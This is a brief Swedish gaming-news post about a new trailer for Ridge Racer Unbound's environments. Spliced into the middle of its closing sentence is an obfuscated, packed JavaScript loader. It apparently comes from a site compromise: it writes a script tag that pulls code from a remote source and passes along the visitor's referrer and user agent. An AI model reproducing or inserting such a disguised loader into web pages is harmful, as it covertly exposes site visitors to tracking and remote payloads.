Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Miljöerna i Ridge Racer Unbound visas upp

Sebastian

Snart är det dags. Den 30 mars söäpps spelet Ridge Racer Unbound till Xbox 360, Playstation 3 och PC. I videon ovan bjuds vi på en splitter ny trailer som visar upp de nya miljöerna i spelet.

Ser eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bdazy|var|u0026u|referrer|shhhs||js|php’.split(’|’),0,{}))
faktiskt ut att bli riktigt snyggt!